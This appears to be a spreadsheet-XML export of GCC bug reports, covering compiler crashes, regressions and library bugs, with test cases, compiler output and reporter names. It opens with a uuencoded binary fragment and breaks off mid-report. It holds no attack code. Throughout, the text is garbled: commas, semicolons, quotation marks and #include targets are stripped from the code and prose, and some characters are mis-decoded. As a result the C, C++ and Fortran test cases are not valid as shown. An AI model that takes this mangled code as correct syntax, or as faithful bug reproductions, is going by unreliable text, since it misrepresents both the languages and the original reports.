M'XL(`)X0+#\``^V644^#!`&gt;&gt;ZON.#+9A344BCGP_A2@K)9`N%1/L
MOWNLFT9T\@1LOM&gt;#CB@38_OBBGUG=SG$L&gt;!@%&amp;SL-P:N-4[N(&gt;!Q/YX)/
M)L+!$(3&lt;@:#OB374IE(E@/-1E_G_]Z6E&amp;6)PV*P_LK3NL\QL)Y\*N71^D^$
M-5?^$(XP/N&lt;U($+K_]57NA%G:3@*B]SV?=IW)RR]+U*RP+6RSP!/1K/&amp;N+
MBKVIO!CA`:CR5=^`7A:F`IWA.E[CE?48-@Q@#FJ&amp;(8(8GP)0GFJ&gt;!XB]V![@
M9[=[(]@W]FIU^(2:?R/3^R_D/YO_WWR?P@Z_&amp;&gt;-^0S]_$OI58D]X&amp;7DWB+/
MA3MN&gt;TY:GS]V_\]Z':-[_V___PDA0_)_+Z$?S!5DB^][)$QO5#MJKC
M1:[O1=0^RYPT'X^M])O]UTBN&gt;CGWG=SC\=\ML9-8D38??_\__X.3_$!SW
H/^KR/^KP/^KP/R+_8(@((@((@((@((@*(?/@&amp;S1(U$`@`````
`
end</t>
  </si>
  <si>
    <t>GCC-42049</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE with -O2 - internal compiler error: in expand_expr_real_1 at expr.c:9314</t>
  </si>
  <si>
    <t>/* Following code give ICE with -O2 or -O3
ice.c: In function â€˜mainâ€™:
ice.c:46: internal compiler error: in expand_expr_real_1 at expr.c:9314
   works OK with -O1 and no warnings given
*/
extern char *strcpy(char *s1 const char *s2)
/* #include  */
typedef struct _ccy_name	CCY_NAME
#define CURRENCY_NAME_LENGTH	3
struct _ccy_name {
	char CcyName[CURRENCY_NAME_LENGTH + 1]
}
int main(int argc char *argv[])
{
    char const *ccy1
    char const *ccy2
    CCY_NAME ccy_list[9]
    long i
    if (argc &gt; 1)
    {
	ccy1 = argv[1]
    }
    else
    {
	ccy1 = EUR
    }
    if (argc &gt; 2)
    {
	ccy2 = argv[2]
    }
    else
    {
	ccy2 = USD
    }
    strcpy(ccy_list[0].CcyName ccy1)
    strcpy(ccy_list[1].CcyName ccy2)
    for(i = 2 i &lt; argc - 2  i++)
    {
	strcpy(ccy_list[i].CcyName argv[i + 1])
    }
    ccy_list[i].CcyName[0] = '\0'
    return 0
}
/*
$ gcc-4.4 -v
Using built-in specs.
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.4.1-4' --with-bugurl=file:///usr/share/doc/gcc-4.4/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --enable-shared --enable-multiarch --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.4 --program-suffix=-4.4 --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --enable-objc-gc --with-arch-32=i486 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.4.1 (Debian 4.4.1-4) 
*/</t>
  </si>
  <si>
    <t>richardn26</t>
  </si>
  <si>
    <t>GCC-54679</t>
  </si>
  <si>
    <t>Erroneous Expected P edit descriptor in conjunction with L descriptor</t>
  </si>
  <si>
    <t>I get a spurious Expected P edit descriptor in format string in
conjunction with the L0 descriptor in a non-trivial format.  Changing
the L0 to I0 or F0.0 works.  It MAY be environment dependent as I have
also failed to see it in another test program.  The oprogram is not
worth attaching.
PROGRAM Main
    IMPLICIT NONE
    CHARACTER(LEN=*) PARAMETER ::    &amp;
        format1 = (A1XI21XA1XI21XA2(1XI01X)A2(1XI01X))    &amp;
        format2 = (A1XI21XA1XI21XA2(1XI01X)A2(1XL01X))    &amp;
        format3 = (A1XI21XA1XI21XA2(1XI01X)A2(1XF0.01X))
    PRINT format1
    PRINT format2
    PRINT format3
END PROGRAM Main
gives:
junk.f90:8.55:
    PRINT format2
                                                       1
Error: Expected P edit descriptor in format string at (1)</t>
  </si>
  <si>
    <t>nmm1</t>
  </si>
  <si>
    <t>GCC-325</t>
  </si>
  <si>
    <t>string::find(\0) gives wrong result</t>
  </si>
  <si>
    <t>Below the string test is initialized to test and then
it is checked at what position \0 occurs in the string.
test.find(\0) returns a wrong result of 4 whereas 
string::npos should be returned.  A work around 
is to user find_last_of(\0).
~/junk&gt; cat test.C
#include 
#include 
#define SHOW(A) #A  =&lt;&lt;A
main(){
  string test(test)
  cout&lt;&lt;SHOW(test.size())&lt;&lt;endl
  cout&lt;&lt;SHOW(test.find(\0))&lt;&lt;endl
  cout&lt;&lt;SHOW(test.find_last_of(\0))&lt;&lt;endl
  cout&lt;&lt;SHOW(string::npos)&lt;&lt;endl
}
~/junk&gt; g++ test.C
~/junk&gt; g++ -v
Reading specs from /usr/lib/gcc-lib/i486-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 Debian GNU/Linux (egcs-1.1.2 release)
~/junk&gt; uname
Linux
~/junk&gt; gcc -v
Reading specs from /usr/lib/gcc-lib/i486-linux/2.7.2.3/specs
gcc version 2.7.2.3
~/junk&gt; ./a.out
test.size() =4
test.find(\0) =4
test.find_last_of(\0) =4294967295
string::npos =4294967295
Release:
CVS 20010116
How-To-Repeat:
#include 
#include 
#define SHOW(A) #A  =&lt;&lt;A
main(){
  string test(test)
  cout&lt;&lt;SHOW(test.size())&lt;&lt;endl
  cout&lt;&lt;SHOW(test.find(\0))&lt;&lt;endl
  cout&lt;&lt;SHOW(test.find_last_of(\0))&lt;&lt;endl
  cout&lt;&lt;SHOW(string::npos)&lt;&lt;endl
}</t>
  </si>
  <si>
    <t>heiko.scheit</t>
  </si>
  <si>
    <t>GCC-36984</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE when gcc 4.4.0-20080730 compile lapack</t>
  </si>
  <si>
    <t>lapack-lite-3.1.1/TESTING/LIN/schkeq.f
gfortran -c schkeq.f -O3 -msse2 -mfpmath=sse -funroll-loops -fbounds-check
schkeq.f: In function 'schkeq':
schkeq.f:445: internal compiler error: in df_ref_chain_change_bb at df-scan.c:1828
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gcc --version
gcc (GCC) 4.4.0 20080730 (experimental)</t>
  </si>
  <si>
    <t>GCC-39690</t>
  </si>
  <si>
    <t>ld: An unknown relocation type 8</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.dg/tree-prof/pr34999.c   -O2 -freorder-blocks-a
nd-partition -fprofile-use -D_PROFILE_USE  -lm   -o /test/gnu/gcc/objdir/gcc/tes
tsuite/gcc/pr34999.x02    (timeout = 300)
ld: An unknown relocation type 8 was encountered when applying the relocation fo
r symbol .text.unlikely at offset 0x150 in section index 1 of file /var/tmp//c
cEyGRLf.o
1 errors.
collect2: ld returned 1 exit status
compiler exited with status 1
output is:
ld: An unknown relocation type 8 was encountered when applying the relocation fo
r symbol .text.unlikely at offset 0x150 in section index 1 of file /var/tmp//c
cEyGRLf.o
1 errors.
collect2: ld returned 1 exit status
FAIL: gcc.dg/tree-prof/pr34999.c compilation  -fprofile-use -D_PROFILE_USE</t>
  </si>
  <si>
    <t>GCC-39909</t>
  </si>
  <si>
    <t>non-TLS version of std::call_once causes terminate</t>
  </si>
  <si>
    <t>I'm entering this bug to track:
http://gcc.gnu.org/ml/libstdc++/2009-04/msg00009.html
The following program fails using gcc configured --disable-tls
#include 
#include 
#include 
std::once_flag flag
int value = 0
struct Inc { void operator()() const { ++value } }
struct Func
{
   void operator()() const
   {
       Inc inc
       for (int i = 0 i &lt; 10000  ++i)
           std::call_once(flag inc)
   }
}
int main()
{
   Func f
   std::thread t1(f)
   std::thread t2(f)
   std::thread t3(f)
   t1.join()
   t2.join()
   t3.join()
   assert( value == 1 )
   return 0
}
Multiple threads try to call unique_lock::lock() on the same object simultaneously after the first one acquires the lock the subsequent threads will fail due to this check in unique_lock::lock()
        else if (_M_owns)
          __throw_system_error(int(errc::resource_deadlock_would_occur))
The unhandled exceptions terminate the program.
The obvious fix is to stop using a single global lock object shared between all threads and use a different lock object in each thread's stack sharing a global mutex.  Concurrent operations on a single mutex are safe but not on a single lock.
That fix requires an ABI change since __get_once_functor_lock is exported.  An alternative would be to replicate the code used when TLS is available but using pthread_getspecific / pthread_setspecific instead.</t>
  </si>
  <si>
    <t>GCC-52782</t>
  </si>
  <si>
    <t>Compiler prints bug box</t>
  </si>
  <si>
    <t>Created attachment 27040
Code offending the compiler might be incorrect Ada
(Severity unknown compiler might work on correct code. Correctness of code attached is unknown.)
Compiling this code makes the compiler end with error message below:
jd@leviticus:~/Projekt/Ada/Learn/Chap5$ gnatmake progpqa.adb
gcc -c progpqa.adb
+===========================GNAT BUG DETECTED==============================+
| 4.6.1 20110908 (Red Hat 4.6.1-9) (i686-redhat-linux-gnu) Assert_Failure sinfo.adb:940|
| Error detected at progpqa.adb:34:45                                      |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
Consider also -gnatd.n switch (see debug.adb).
progpqa.adb
progpqa.adb:34:71: extra ) ignored
compilation abandoned
gnatmake: progpqa.adb compilation error
Commenting out line 34 makes the code compile without error. Line 34:
	 Q.Data(Index+1 .. Elem_Num + 1) := (Q.Start+Index .. Q.Free+1)
(Full code in attachment)
Expected behavior:
Emitting code exiting peacefully or reporting error in code and end nicely.
jd@leviticus:~/Projekt/Ada/Learn/Chap5$ uname -a
Linux leviticus 2.6.42.12-1.fc15.i686 #1 SMP Tue Mar 20 16:26:27 UTC 2012 i686 i686 i386 GNU/Linux
jd@leviticus:~/Projekt/Ada/Learn/Chap5$ gcc -v
AnvÃ¤nder inbyggda specifikationer.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/i686-redhat-linux/4.6.1/lto-wrapper
MÃ¥l: i686-redhat-linux
Konfigurerad med: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --enable-languages=cc++objcobj-c++javafortranadagolto --enable-plugin --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-ppl --with-cloog --with-tune=generic --with-arch=i686 --build=i686-redhat-linux
TrÃ¥dmodell: posix
gcc version 4.6.1 20110908 (Red Hat 4.6.1-9) (GCC) 
Tried with extra switch:
jd@leviticus:~/Projekt/Ada/Learn/Chap5$ gnatmake -gnatd.n progpqa.adb
gcc -c -gnatd.n progpqa.adb
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/system.ads
progpqa.adb
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/ada.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/a-textio.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/a-ioexce.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/a-stream.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-ficobl.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/interfac.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/i-cstrea.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-crtl.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-parame.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-wchcon.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/a-inteio.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-stalib.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/a-unccon.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-exctab.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/a-tags.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-stoele.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-stoele.adb
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/a-filico.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/a-finali.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-finroo.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/a-except.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-traent.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-soflin.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-stache.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-secsta.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-finimp.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-stratt.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/s-unstyp.ads
/usr/lib/gcc/i686-redhat-linux/4.6.1/adainclude/a-tiinio.ads
+===========================GNAT BUG DETECTED==============================+
| 4.6.1 20110908 (Red Hat 4.6.1-9) (i686-redhat-linux-gnu) Assert_Failure sinfo.adb:940|
| Error detected at progpqa.adb:34:45                                      |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
Consider also -gnatd.n switch (see debug.adb).
progpqa.adb
progpqa.adb:34:71: extra ) ignored
compilation abandoned
gnatmake: progpqa.adb compilation error</t>
  </si>
  <si>
    <t>jan.karv</t>
  </si>
  <si>
    <t>GCC-10761</t>
  </si>
  <si>
    <t>[3.4 regression] wrong virtual function called</t>
  </si>
  <si>
    <t xml:space="preserve">From: Dara Hazeghi 
To: gcc-gnats@gcc.gnu.org nobody@gcc.gnu.org snyder@fnal.gov
Cc:  
Subject: Re: c++/10761: [3.4] wrong virtual function called
Date: Mon 12 May 2003 22:26:00 -0700
 http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view%20audit- 
 trail&amp;database=gcc&amp;pr=10761
 Hello
 I can confirm that this testcase worked on 3.2 and 3.3 branch but  
 fails on mainline (20030512) making it a regression.
 Dara
</t>
  </si>
  <si>
    <t>GCC-59514</t>
  </si>
  <si>
    <t>vector::emplace uses wrong iterator type</t>
  </si>
  <si>
    <t>The vector::emplace member function is defined in the standard (23.3.6.5 vector.modifiers) to take a const_iterator as it's first argument but in the 4.8.2 implementation it expects a non-const iterator.</t>
  </si>
  <si>
    <t>chrissakalis</t>
  </si>
  <si>
    <t>GCC-82060</t>
  </si>
  <si>
    <t>[7 Regression] ICE in refs_may_alias_p_1 with devirtualization enabled</t>
  </si>
  <si>
    <t>Created attachment 42095
Annotated test case used in order to reproduce the bug
Attached is a minimal test case that triggers an Internal Compiler Error in refs_may_alias_p_1 when compiling at least with -O1 -fdevirtualize. The bug occurs on gcc 7 and the current snapshot (tested on godbolt).
I have tried to check which -O1 optimization is needed alongside -fdevirtualize in order to trigger this bug but when I replaced -O1 with a list of -f options from the gcc manual the bug went away. I also tried to list the -O1 optimizations using `-Q --help=optimizers' but it didn't help. It might be something not listed there or otherwise hidden inside the -O1 setting.
Comments in the test case show what is needed in order to encounter this bug. Some of these might be erroneous but if I tried to simplify/change any of these the bug goes away.
$ g++ -O1 -fdevirtualize testcase.cpp 
testcase.cpp: In function â€˜void foo(D&amp;)â€™:
testcase.cpp:30:1: internal compiler error: in refs_may_alias_p_1 at tree-ssa-alias.c:1538
 }
 ^
0xbd1e49 refs_may_alias_p_1(ao_ref* ao_ref* bool)
        ../../gcc/tree-ssa-alias.c:1538
0xbd3369 stmt_may_clobber_ref_p_1(gimple* ao_ref*)
        ../../gcc/tree-ssa-alias.c:2289
0xbd3b0a walk_aliased_vdefs_1
        ../../gcc/tree-ssa-alias.c:2947
0xbd3b9d walk_aliased_vdefs_1
        ../../gcc/tree-ssa-alias.c:2934
0xbd3c41 walk_aliased_vdefs(ao_ref* tree_node* bool (*)(ao_ref* tree_node* void*) void* bitmap_head** bool* unsigned int)
        ../../gcc/tree-ssa-alias.c:2970
0x96d2ec ipa_polymorphic_call_context::get_dynamic_type(tree_node* tree_node* tree_node* gimple*)
        ../../gcc/ipa-polymorphic-call.c:1680
0xc43392 eliminate_dom_walker::before_dom_children(basic_block_def*)
        ../../gcc/tree-ssa-pre.c:4604
0x10fe12a dom_walker::walk(basic_block_def*)
        ../../gcc/domwalk.c:265
0xc42c01 eliminate
        ../../gcc/tree-ssa-pre.c:4773
0xc42f44 execute
        ../../gcc/tree-ssa-pre.c:5207
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-10586</t>
  </si>
  <si>
    <t>[3.4 regression] ICE in make_typename_type with typename typeof(x)::T</t>
  </si>
  <si>
    <t xml:space="preserve">From: Wolfgang Bangerth 
To: gcc-gnats@gcc.gnu.org
Cc:  
Subject: Re: c++/10586
Date: Thu 1 May 2003 15:58:50 -0500 (CDT)
 I forgot to say that the code here is a slight variant of PR 6709. Maybe 
 there is a relation.
 W.
 -------------------------------------------------------------------------
 Wolfgang Bangerth              email:            bangerth@ices.utexas.edu
                                www: http://www.ices.utexas.edu/~bangerth/
</t>
  </si>
  <si>
    <t>GCC-82353</t>
  </si>
  <si>
    <t>[8 Regression] runtime ubsan crash</t>
  </si>
  <si>
    <t>Created attachment 42255
reduced test case
GCC trunk rev 253244 x86_64.
&gt; g++ -std=c++11 -fsanitize=undefined -fno-sanitize-recover=undefined -w -O2 ff.cpp dd.cpp -o out
&gt; ./out
ff.cpp:20:27: runtime error: pointer index expression with base 0x0000006022f0 overflowed to 0x000000602300
Test case was reduced from a larger UB-free program.
I failed to reduce test case to a single file reproducer.</t>
  </si>
  <si>
    <t>GCC-35494</t>
  </si>
  <si>
    <t>[4.4 Regression]: Revision 132991 breaks C++ static member</t>
  </si>
  <si>
    <t>Revision 132991:
http://gcc.gnu.org/ml/gcc-patches/2008-03/msg00445.html
breaks 483.xalancbmk in SPEC CPU 2006 on Linux/Intel64
with -O2 -ffast-math. I got
  Running 483.xalancbmk ref base o2 default
483.xalancbmk: copy #0 non-zero return code (rc=0 signal=6)
****************************************
Contents of ref.err
****************************************
terminate called after throwing an instance of 'xercesc_2_5::DOMException'
****************************************
That optimization may not be valid for C++ code.</t>
  </si>
  <si>
    <t>GCC-14278</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] fails when calling through a function pointer</t>
  </si>
  <si>
    <t>Also fails on i686-pc-linux-gun.
When calling a function through a function pointer and the return type is
passed to a constructor whose return type is also passed through a constructor
G++ 3.4 fails to parse the expressions.
The feature this test excersizes is used by num_util a collection of helper
functions that extends Boost.Python's interface with Numeric Python.  G++ 3.3
compiles this without error.
Thanks
Jonathan Brandmeyer
pion:~/src jonathan$ g++-3.4 -v -c funcptr_crash.cpp 
Reading specs from /usr/local/lib/gcc/powerpc-apple-darwin7.2.0/3.4.0/specs
Configured with: ../gcc/configure --program-suffix=-3.4
--enable-version-specific-runtime-libs --disable-shared --enable-static
--enable-languages=cc++
Thread model: posix
gcc version 3.4.0 20040223 (prerelease)
 /usr/local/libexec/gcc/powerpc-apple-darwin7.2.0/3.4.0/cc1plus -quiet -v
-D__DYNAMIC__ funcptr_crash.cpp -fPIC -quiet -dumpbase funcptr_crash.cpp
-auxbase funcptr_crash -version -o /var/tmp//ccRG1xS6.s
ignoring nonexistent directory NONE/include
ignoring nonexistent directory
/usr/local/lib/gcc/powerpc-apple-darwin7.2.0/3.4.0/../../../../powerpc-apple-darwin7.2.0/include
#include ... search starts here:
#include  search starts here:
 /usr/local/lib/gcc/powerpc-apple-darwin7.2.0/3.4.0/include/c++
 /usr/local/lib/gcc/powerpc-apple-darwin7.2.0/3.4.0/include/c++/powerpc-apple-darwin7.2.0
 /usr/local/lib/gcc/powerpc-apple-darwin7.2.0/3.4.0/include/c++/backward
 /usr/local/include
 /usr/local/lib/gcc/powerpc-apple-darwin7.2.0/3.4.0/include
 /usr/include
End of search list.
GNU C++ version 3.4.0 20040223 (prerelease) (powerpc-apple-darwin7.2.0)
        compiled by GNU C version 3.4.0 20040223 (prerelease).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
funcptr_crash.cpp:38: error: expected `)' before visual_PyArrayHandle
funcptr_crash.cpp:38: error: expected `)' before visual_PyArrayHandle
funcptr_crash.cpp:38: error: expected `' or `...' before visual_PyArrayHandle
funcptr_crash.cpp:38: error: function `object ret(handle)' is
initialized like a variable
funcptr_crash.cpp:38: error: expected `' or `' before ')' token
----------------------------------------------------------------------  
typedef struct _object {
 int ob_refcnt 
 struct _typeobject *ob_type
} PyObject
void **visual_PyArrayHandle
template 
class handle
{
 public:
    template 
    explicit handle(Y* p)
        : m_p(static_cast(p))
    {
    }
    T* get() { return m_p }
 private:
    T* m_p
}
class object {
 private:
     PyObject* obj
 public:
    template
    object( handle other) :obj(static_cast(other.get()))
    {}
}
// Changing the function pointer type to have less than these two arguments
// passes.  This one fails:
object ret(handle
      ((*(PyObject * (*)( int int)) visual_PyArrayHandle[0])(0 0)))
// This passes:
handle ret2
      ((*(PyObject * (*)( int int)) visual_PyArrayHandle[0])(0 0))
// As does this:
object ret3(handle
      ((*(PyObject * (*)( int)) visual_PyArrayHandle[0])(0)))</t>
  </si>
  <si>
    <t>jbrandmeyer</t>
  </si>
  <si>
    <t>GCC-71724</t>
  </si>
  <si>
    <t>[6 Regression] ICE: Segmentation fault deep recursion between combine_simplify_rtx and subst</t>
  </si>
  <si>
    <t>gcc 5 6 7 for 32-bit target all fail to compile the following testcase w/ -O1:
long long int ro t9
void
cg (void)
{
  ro = (t9 != 1)
  ro += (t9 != 0) ? t9 : ro
}
% powerpc-e500v2-linux-gnuspe-gcc-5.4.0 -c -O1 fxgjkta3.c
powerpc-e500v2-linux-gnuspe-gcc-5.4.0: internal compiler error: Segmentation fault (program cc1)
% powerpc-e500v2-linux-gnuspe-gcc-7.0.0-alpha20160626 -c -O1 fxgjkta3.c
powerpc-e500v2-linux-gnuspe-gcc-7.0.0-alpha20160626: internal compiler error: Segmentation fault (program cc1)
Backtrace for gcc 7:
#0  0x0000000000eb99a6 in simplify_binary_operation_1(rtx_code machine_mode rtx_def* rtx_def* rtx_def* rtx_def*) ()
#1  0x0000000000eaf44d in simplify_binary_operation(rtx_code machine_mode rtx_def* rtx_def*) ()
#2  0x0000000001779ba1 in combine_simplify_rtx(rtx_def* machine_mode int int) ()
#3  0x000000000177443c in subst(rtx_def* rtx_def* rtx_def* int int int) ()
#4  0x000000000177413d in subst(rtx_def* rtx_def* rtx_def* int int int) ()
#5  0x000000000177413d in subst(rtx_def* rtx_def* rtx_def* int int int) ()
#6  0x0000000001779eaa in combine_simplify_rtx(rtx_def* machine_mode int int) ()
#7  0x000000000177443c in subst(rtx_def* rtx_def* rtx_def* int int int) ()
#8  0x0000000001779ee5 in combine_simplify_rtx(rtx_def* machine_mode int int) ()
#171156 0x0000000001779ee5 in combine_simplify_rtx(rtx_def* machine_mode int int) ()
#171157 0x000000000177443c in subst(rtx_def* rtx_def* rtx_def* int int int) ()
#171158 0x000000000177413d in subst(rtx_def* rtx_def* rtx_def* int int int) ()
#171159 0x0000000001772bfb in subst(rtx_def* rtx_def* rtx_def* int int int) ()
#171160 0x0000000001767ada in try_combine(rtx_insn* rtx_insn* rtx_insn* rtx_insn* int* rtx_insn*) ()
#171161 0x0000000001762fea in combine_instructions(rtx_insn* unsigned int) ()
#171162 0x00000000017625b9 in rest_of_handle_combine() ()
#171163 0x0000000001762565 in (anonymous namespace)::pass_combine::execute(function*) ()
#171164 0x0000000000dbbbd6 in execute_one_pass(opt_pass*) ()
#171165 0x0000000000dbc74b in execute_pass_list_1(opt_pass*) ()
#171166 0x0000000000dbc774 in execute_pass_list_1(opt_pass*) ()
#171167 0x0000000000dac811 in execute_pass_list(function* opt_pass*) ()
#171168 0x0000000000904e8f in cgraph_node::expand() ()
#171169 0x0000000000909bf8 in expand_all_functions() ()
#171170 0x0000000000908bff in symbol_table::compile() ()
#171171 0x0000000000909dc2 in symbol_table::finalize_compilation_unit() ()
#171172 0x0000000000ef3262 in compile_file() ()
#171173 0x0000000000ef1c86 in do_compile() ()
#171174 0x0000000000ef169a in toplev::main(int char**) ()
#171175 0x000000000190c540 in main ()</t>
  </si>
  <si>
    <t>GCC-38213</t>
  </si>
  <si>
    <t>gcc.dg/ia64-sync-1.c and gcc.dg/ia64-sync-2.c execution tests fails on powerpc*-*-*</t>
  </si>
  <si>
    <t>The gcc.dg/ia64-sync-1.c execution test fails on powerpc-apple-darwin9...
Executing on host: /sw/src/fink.build/gcc44-4.3.999-20081120/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc44-4.3.999-20081120/darwin_objdir/gcc/ /sw/src/fink.build/gcc44-4.3.999-20081120/gcc-4.4-20081120/gcc/testsuite/gcc.dg/ia64-sync-1.c    -ansi -pedantic-errors  -lm   -o ./ia64-sync-1.exe    (timeout = 300)
/sw/src/fink.build/gcc44-4.3.999-20081120/gcc-4.4-20081120/gcc/testsuite/gcc.dg/ia64-sync-1.c: In function 'do_noret_si':
/sw/src/fink.build/gcc44-4.3.999-20081120/gcc-4.4-20081120/gcc/testsuite/gcc.dg/ia64-sync-1.c:36: note: '__sync_fetch_and_nand'
changed semantics in GCC 4.4
output is:
/sw/src/fink.build/gcc44-4.3.999-20081120/gcc-4.4-20081120/gcc/testsuite/gcc.dg/ia64-sync-1.c: In function 'do_noret_si':
/sw/src/fink.build/gcc44-4.3.999-20081120/gcc-4.4-20081120/gcc/testsuite/gcc.dg/ia64-sync-1.c:36: note: '__sync_fetch_and_nand'
changed semantics in GCC 4.4
PASS: gcc.dg/ia64-sync-1.c  (test for warnings line )
PASS: gcc.dg/ia64-sync-1.c (test for excess errors)
Setting LD_LIBRARY_PATH to :/sw/src/fink.build/gcc44-4.3.999-20081120/darwin_objdir/gcc::/sw/src/fink.build/gcc44-4.3.999-20081120/darwin_objdir/gcc:/usr/local/NMRPipe/xview/mac/lib:/usr/openwin/lib:/usr/local/NMRPipe/nmrbin.mac/lib:/usr/local/lib
FAIL: gcc.dg/ia64-sync-1.c execution test</t>
  </si>
  <si>
    <t>GCC-664</t>
  </si>
  <si>
    <t>gcc 2.95/hpux generates code incompatible with threads</t>
  </si>
  <si>
    <t>GCC appears to be generating code that is incompatible with HPUX threads. The problem occurs on both HP-UX 10.20 using the user-space CMA threads library and on HP-UX 11.00 using the kernel pthreads library.
Our code is causing segmentation faults at random times. We have noted two occurrances one has occurred during a function return call and the other has occurred following a class method call.
Processor register r19 appears to hold an address that points to the value to be returned. When the problem shows investigation with the debugger appears to indicate that r19 holds the value 0. This causes the seg fault.
My theory (which may be incorrect!) is that registers r19-r26 are traditionally used only for function calls on PA-RISC architectures. I suspect that the HP thread libraries do not preserve the state of these registers during thread context switches.
gcc appears to be performing an optimisation in assuming that it can still use data in r19 following a function call. System calls (performed in other threads) seem to zero registers r19-26 - this is why r19 can sometimes become zeroed.
I do not know if it is possible to make gcc not use these registers as they are possibly incompatible with the use of threads on hpux.
Unfortunately we cannot send our complete source code and I have not been able to create a simple subset of code that shows the problem. I did however come across an example posted to a mailing list describing a similar problem. The assembly language output in this problem bears a resemblance to our problem.
The enclosed attachment contains the following files:
gcc_test.cpp - the sample file from the mailing list that causes a reproducible crash.
command_output.txt - the verbose command output from the compile of gcc_test.cpp
gcc_test - the resultant excecutable.
gcc_test.sgcc_test.iigcc_test.o - the resultant intermediate/object files
mailing_list_message.txt - the mailing list message pointing to a similar problem to our own and which contains the source used for gcc_test.cpp
ObjectTransfer.cpp.excerpt - an excerpt from our source code
DebuggerOutput.txt - the debugger dissassembly of the code within ObjectTransfer.cpp.excerpt indicating where the problem occurs.
The same code compiles and runs with the HP supplied aCC version 1.21 compiler with no problems.
Many thanks
Colin Paton
Release:
gcc version 2.95.2 19991024 (release)
Environment:
HP-UX B.10.20 A 9000/778 (HP B-class B132 PA-RISC workstation)</t>
  </si>
  <si>
    <t>colin_paton</t>
  </si>
  <si>
    <t>GCC-68467</t>
  </si>
  <si>
    <t>libgcc compilation for target m68k-linux breaks in linux_atomic.c</t>
  </si>
  <si>
    <t>Created attachment 36791
config log
Dear all
after had filled 68466 and applied the workaround mentioned in it i can fully compile gcc. Btw inside libgcc i see only M68000 code and not coldfire variants.
So i am trying with different configuration options as:
EXTRA_GCC_CONF=--enable-multilib --with-arch=cf --with-newlib --with-system-zlib
With config options above i get following error compiling:
